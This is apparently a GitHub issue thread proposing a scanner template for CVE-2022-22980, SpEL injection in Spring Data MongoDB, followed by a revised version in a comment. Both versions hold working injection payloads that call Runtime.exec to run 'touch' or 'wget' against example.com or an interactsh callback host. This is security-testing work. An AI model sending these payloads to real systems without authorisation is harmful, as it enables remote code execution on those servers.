### ISSUE TITLE
CVE-2022-22980 Spring Data MongoDB SpEL Expression Injection

### ISSUE THREAD

**Issue by codgin** [projectdiscovery/nuclei-templates#5559]
```yaml
id: CVE-2022-22980

info:
  name: Spring Data MongoDB SpEL Expression Injection
  author: aomux
  severity: critical
  description: A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized.
  reference:
    - https://github.com/murataydemir/CVE-2022-22980
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22980
    - https://tanzu.vmware.com/security/cve-2022-22980
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22980
    cwe-id: CWE-917

  tags: cve,cve2022,Spring,SpEL

requests:
  - raw:
      - |
        POST /v1/user/get? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        keyword={{spel}}

      - |
        GET /v1/user/get?username={{spel}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    payloads:
      spel:
        - 'T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27touch%20/tmp/foo%27)'
        - 'T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27wget%2Bexample.com%27)'

    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 500

```

**Comment by akincibor** [comment]
```yaml
id: CVE-2022-22980

info:
  name: Spring Data MongoDB SpEL Expression Injection
  author: aomux,akincibor
  severity: critical
  description: A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized.
  reference:
    - https://github.com/murataydemir/CVE-2022-22980
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22980
    - https://tanzu.vmware.com/security/cve-2022-22980
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22980
    cwe-id: CWE-917

  tags: cve,cve2022,spring,spel,mongodb,rce

requests:
  - raw:
      - |
        POST /v1/user/get? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        keyword={{spel}}

      - |
        GET /v1/user/get?username={{spel}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    payloads:
      spel:
        - 'T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27wget%2B{{interactsh-url}}%27)'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

```
